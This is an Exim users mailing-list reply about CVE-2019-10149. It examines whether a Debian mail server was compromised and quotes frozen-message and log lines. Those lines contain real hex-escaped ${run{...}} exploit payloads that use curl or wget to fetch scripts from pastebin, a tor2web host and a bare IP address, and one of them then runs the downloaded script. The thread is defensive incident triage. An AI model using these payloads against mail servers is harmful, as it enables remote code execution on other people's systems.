Re: [exim] CVE-2019-10149: already vulnerable ?

Startseite
Nachricht löschen
Nachricht beantworten
Autor: Heiko Schlittermann
Datum:  
To: exim-users
Betreff: Re: [exim] CVE-2019-10149: already vulnerable ?
Hi,

Benoît PELISSIER via Exim-users <exim-users@???> (Fr 21 Jun 2019 09:00:17 CEST):
> My mail system ha been hacked ? CVE-2019-10149 ?


At least it was under attack.

> exim --version
> Exim version 4.89 #1 built 28-May-2019 20:13:55
> aptitude show exim4-config
> Paquet : exim4-config
> Version : 4.89-2+deb9u4


The version is fine.
But the question is, when did you install this version?

> 19h 679 1hdvRz-0006wq-0C <> *** frozen ***
>
> ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost


Check your system for unusual activities.
Symptoms on a hacked system I got aware of were quite similar. The log
reported about too many received headers:

root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
2019-06-20 15:13:33 Received from <> H=(<zensored>.de) [89.248.171.57] P=smtp S=1114
2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zensored>.de: Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)

That would have been a better line in the logs (from a fixed system):
2019-06-19 04:07:40 H=(service.com) [68.183.4.19] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20213.227.155.101\x2ftmp\x2f212.80.235.131\x22}}@localhost>: relay not permitted

    Best regards from Dresden/Germany
    Viele Grüße aus Dresden
    Heiko Schlittermann
--
 SCHLITTERMANN.de ---------------------------- internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --------------- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01 ------------ -